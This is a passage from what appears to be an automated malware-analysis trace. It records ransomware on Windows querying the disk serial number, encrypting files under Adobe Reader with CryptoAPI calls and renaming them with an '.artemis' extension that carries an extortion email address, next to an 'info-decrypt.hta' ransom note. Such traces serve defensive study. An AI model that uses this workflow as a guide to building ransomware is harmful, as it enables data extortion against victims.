[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee72c | out: ppvObject=0x6cee72c*=0x781ec4) returned 0x0 [0209.876] WbemLocator:IUnknown:Release (This=0x781ec4) returned 0x3 [0209.876] WbemLocator:IUnknown:Release (This=0x781ec4) returned 0x2 [0209.876] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x6ceec30*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec30*=0x20, pszText=0x0) returned 0x0 [0209.876] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x6ceec30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.877] IWbemServices:GetObject (in: This=0x6747ffc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6ceebe4*=0x0, ppCallResult=0x0 | out: ppObject=0x6ceebe4*=0x673c128, ppCallResult=0x0) returned 0x0 [0210.212] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738850, puCount=0x6ceebe4 | out: puCount=0x6ceebe4*=0x2) returned 0x0 [0210.212] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=4, puBuffLength=0x6ceebe0*=0x0, pszText=0x0 | out: puBuffLength=0x6ceebe0*=0xf, pszText=0x0) returned 0x0 [0210.212] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=4, puBuffLength=0x6ceebe0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceebe0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0210.212] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceebe0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350cd34*=0, plFlavor=0x350cd38*=0 | out: pVal=0x6ceebe0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x350cd34*=8, plFlavor=0x350cd38*=0) returned 0x0 [0210.213] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.213] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.213] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceebe8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350cd34*=8, plFlavor=0x350cd38*=0 | out: pVal=0x6ceebe8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x350cd34*=8, plFlavor=0x350cd38*=0) returned 0x0 [0210.213] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.213] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.213] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", nBufferLength=0x105, lpBuffer=0x6cee7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", lpFilePart=0x0) returned 0x34 [0210.213] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6cee7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x5f [0210.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec48) returned 1 [0210.213] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm"), fInfoLevelId=0x0, lpFileInformation=0x6ceecc4 | out: lpFileInformation=0x6ceecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x221d7480, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x44a0)) returned 1 [0210.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceec44) returned 1 [0210.213] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0210.214] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", nBufferLength=0x105, lpBuffer=0x6cee88c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", lpFilePart=0x0) returned 0x33 [0210.214] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", nBufferLength=0x105, lpBuffer=0x6cee884, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", lpFilePart=0x0) returned 0x33 [0210.214] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6cee88c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0210.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceecec) returned 1 [0210.214] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6ceed68 | out: lpFileInformation=0x6ceed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x109b3760, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x109b3760, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x109b3760, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0210.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceece8) returned 1 [0210.215] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", nBufferLength=0x105, lpBuffer=0x6cee808, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", lpFilePart=0x0) returned 0x33 [0210.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceecb4) returned 1 [0210.215] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm"), fInfoLevelId=0x0, lpFileInformation=0x350d368 | out: lpFileInformation=0x350d368*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4273)) returned 1 [0210.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceecb0) returned 1 [0210.215] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", nBufferLength=0x105, lpBuffer=0x6cee6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", lpFilePart=0x0) returned 0x33 [0210.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceebe8) returned 1 [0210.215] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0210.215] GetFileType (hFile=0x384) returned 0x1 [0210.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceebe4) returned 1 [0210.216] GetFileType (hFile=0x384) returned 0x1 [0210.216] GetFileSize (in: hFile=0x384, lpFileSizeHigh=0x6ceecf0 | out: lpFileSizeHigh=0x6ceecf0*=0x0) returned 0x4273 [0210.426] ReadFile (in: hFile=0x384, lpBuffer=0x35dbb3c, nNumberOfBytesToRead=0x4273, lpNumberOfBytesRead=0x6ceec9c, lpOverlapped=0x0 | out: lpBuffer=0x35dbb3c*, lpNumberOfBytesRead=0x6ceec9c*=0x4273, lpOverlapped=0x0) returned 1 [0210.428] CloseHandle (hObject=0x384) returned 1 [0210.428] CryptAcquireContextW (in: phProv=0x6ceec3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ceec3c*=0x7a9d28) returned 1 [0210.429] CryptGenRandom (in: hProv=0x7a9d28, dwLen=0x10, pbBuffer=0x35e0104 | out: pbBuffer=0x35e0104) returned 1 [0211.557] CryptImportKey (in: hProv=0x7a9d28, pbData=0x3506a08, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6ceec0c | out: phKey=0x6ceec0c*=0x77ad70) returned 1 [0211.557] CryptContextAddRef (hProv=0x7a9d28, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.558] CryptContextAddRef (hProv=0x7a9d28, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.558] CryptDuplicateKey (in: hKey=0x77ad70, pdwReserved=0x0, dwFlags=0x0, phKey=0x6ceebfc | out: phKey=0x6ceebfc*=0x77b3b0) returned 1 [0211.558] CryptContextAddRef (hProv=0x7a9d28, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.558] CryptSetKeyParam (hKey=0x77b3b0, dwParam=0x4, pbData=0x3506ae8*=0x1, dwFlags=0x0) returned 1 [0211.558] CryptSetKeyParam (hKey=0x77b3b0, dwParam=0x1, pbData=0x3506ab4, dwFlags=0x0) returned 1 [0211.558] CryptEncrypt (in: hKey=0x77b3b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3506af8*, pdwDataLen=0x6ceec68*=0x4280, dwBufLen=0x4280 | out: pbData=0x3506af8*, pdwDataLen=0x6ceec68*=0x4280) returned 1 [0211.558] CryptEncrypt (in: hKey=0x77b3b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x350ad9c*, pdwDataLen=0x6ceec70*=0x0, dwBufLen=0x10 | out: pbData=0x350ad9c*, pdwDataLen=0x6ceec70*=0x10) returned 1 [0211.560] CryptDestroyKey (hKey=0x77ad70) returned 1 [0211.560] CryptReleaseContext (hProv=0x7a9d28, dwFlags=0x0) returned 1 [0211.560] CryptReleaseContext (hProv=0x7a9d28, dwFlags=0x0) returned 1 [0211.560] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", nBufferLength=0x105, lpBuffer=0x6cee6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", lpFilePart=0x0) returned 0x33 [0211.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceebd4) returned 1 [0211.560] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0211.561] GetFileType (hFile=0x384) returned 0x1 [0211.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceebd0) returned 1 [0211.561] GetFileType (hFile=0x384) returned 0x1 [0211.561] WriteFile (in: hFile=0x384, lpBuffer=0x351e550*, nNumberOfBytesToWrite=0x4490, lpNumberOfBytesWritten=0x6ceec90, lpOverlapped=0x0 | out: lpBuffer=0x351e550*, lpNumberOfBytesWritten=0x6ceec90*=0x4490, lpOverlapped=0x0) returned 1 [0211.562] CloseHandle (hObject=0x384) returned 1 [0211.563] CoTaskMemAlloc (cb=0x20c) returned 0x6f2ec08 [0211.563] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x6f2ec08 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0211.563] CoTaskMemFree (pv=0x6f2ec08) [0211.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6cee6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0211.752] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceec10 | out: ppv=0x6ceec10*=0x72015c) returned 0x0 [0211.752] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceec08 | out: pAptType=0x6ceec08*=1) returned 0x0 [0211.752] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceec0c | out: ppvObject=0x6ceec0c*=0x0) returned 0x80004002 [0211.752] IUnknown:Release (This=0x72015c) returned 0x1 [0211.753] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee578 | out: ppv=0x6cee578*=0x6736de8) returned 0x0 [0211.753] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736de8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee790 | out: ppvObject=0x6cee790*=0x0) returned 0x80004002 [0211.753] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736de8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee7a4 | out: ppvObject=0x6cee7a4*=0x6738690) returned 0x0 [0211.753] WbemDefPath:IUnknown:Release (This=0x6736de8) returned 0x0 [0211.753] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3c4 | out: ppvObject=0x6cee3c4*=0x6738690) returned 0x0 [0211.753] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee380 | out: ppvObject=0x6cee380*=0x0) returned 0x80004002 [0211.754] WbemDefPath:IUnknown:AddRef (This=0x6738690) returned 0x3 [0211.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedcdc | out: ppvObject=0x6cedcdc*=0x0) returned 0x80004002 [0211.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedc8c | out: ppvObject=0x6cedc8c*=0x0) returned 0x80004002 [0211.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedc98 | out: ppvObject=0x6cedc98*=0x9820fe8) returned 0x0 [0211.754] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820fe8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedca0 | out: pCid=0x6cedca0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0211.754] WbemDefPath:IUnknown:Release (This=0x9820fe8) returned 0x3 [0211.754] CoGetContextToken (in: pToken=0x6cedcf8 | out: pToken=0x6cedcf8) returned 0x0 [0211.754] CoGetContextToken (in: pToken=0x6cee100 | out: pToken=0x6cee100) returned 0x0 [0211.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee190 | out: ppvObject=0x6cee190*=0x0) returned 0x80004002 [0211.754] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x2 [0211.754] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x1 [0211.754] CoGetContextToken (in: pToken=0x6ceea88 | out: pToken=0x6ceea88) returned 0x0 [0211.754] CoGetContextToken (in: pToken=0x6cee9e8 | out: pToken=0x6cee9e8) returned 0x0 [0211.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x6ceeab8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ceeab4 | out: ppvObject=0x6ceeab4*=0x6738690) returned 0x0 [0211.754] WbemDefPath:IUnknown:AddRef (This=0x6738690) returned 0x3 [0211.754] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x2 [0211.754] WbemDefPath:IWbemPath:SetText (This=0x6738690, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0211.754] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x6ceec3c | out: puCount=0x6ceec3c*=0x0) returned 0x0 [0211.754] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x6ceec38*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec38*=0x20, pszText=0x0) returned 0x0 [0211.754] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x6ceec38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0211.755] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0211.755] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x6ceec3c | out: puCount=0x6ceec3c*=0x0) returned 0x0 [0211.755] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0211.755] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0211.755] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x6ceebbc | out: puCount=0x6ceebbc*=0x0) returned 0x0 [0211.755] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6ceeba8 | out: puCount=0x6ceeba8*=0x2) returned 0x0 [0211.755] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceeba4*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeba4*=0xf, pszText=0x0) returned 0x0 [0211.755] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceeba4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeba4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.755] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeb58 | out: ppv=0x6ceeb58*=0x72015c) returned 0x0 [0211.755] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeb50 | out: pAptType=0x6ceeb50*=1) returned 0x0 [0211.755] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeb54 | out: ppvObject=0x6ceeb54*=0x0) returned 0x80004002 [0211.755] IUnknown:Release (This=0x72015c) returned 0x1 [0211.756] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee4c0 | out: ppv=0x6cee4c0*=0x6737028) returned 0x0 [0211.756] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737028, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee6d8 | out: ppvObject=0x6cee6d8*=0x0) returned 0x80004002 [0211.756] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737028, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee6ec | out: ppvObject=0x6cee6ec*=0x6738bd0) returned 0x0 [0211.756] WbemDefPath:IUnknown:Release (This=0x6737028) returned 0x0 [0211.756] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee30c | out: ppvObject=0x6cee30c*=0x6738bd0) returned 0x0 [0211.756] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee2c8 | out: ppvObject=0x6cee2c8*=0x0) returned 0x80004002 [0211.756] WbemDefPath:IUnknown:AddRef (This=0x6738bd0) returned 0x3 [0211.756] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedc24 | out: ppvObject=0x6cedc24*=0x0) returned 0x80004002 [0211.756] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedbd4 | out: ppvObject=0x6cedbd4*=0x0) returned 0x80004002 [0211.756] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedbe0 | out: ppvObject=0x6cedbe0*=0x77dcc8) returned 0x0 [0211.756] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dcc8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedbe8 | out: pCid=0x6cedbe8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0211.756] WbemDefPath:IUnknown:Release (This=0x77dcc8) returned 0x3 [0211.756] CoGetContextToken (in: pToken=0x6cedc40 | out: pToken=0x6cedc40) returned 0x0 [0211.756] CoGetContextToken (in: pToken=0x6cee048 | out: pToken=0x6cee048) returned 0x0 [0211.756] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee0d8 | out: ppvObject=0x6cee0d8*=0x0) returned 0x80004002 [0211.756] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x2 [0211.756] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x1 [0211.757] CoGetContextToken (in: pToken=0x6cee9d0 | out: pToken=0x6cee9d0) returned 0x0 [0211.757] CoGetContextToken (in: pToken=0x6cee930 | out: pToken=0x6cee930) returned 0x0 [0211.757] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x6ceea00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6cee9fc | out: ppvObject=0x6cee9fc*=0x6738bd0) returned 0x0 [0211.757] WbemDefPath:IUnknown:AddRef (This=0x6738bd0) returned 0x3 [0211.757] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x2 [0211.757] WbemDefPath:IWbemPath:SetText (This=0x6738bd0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0211.757] WbemDefPath:IWbemPath:GetNamespaceCount (in: 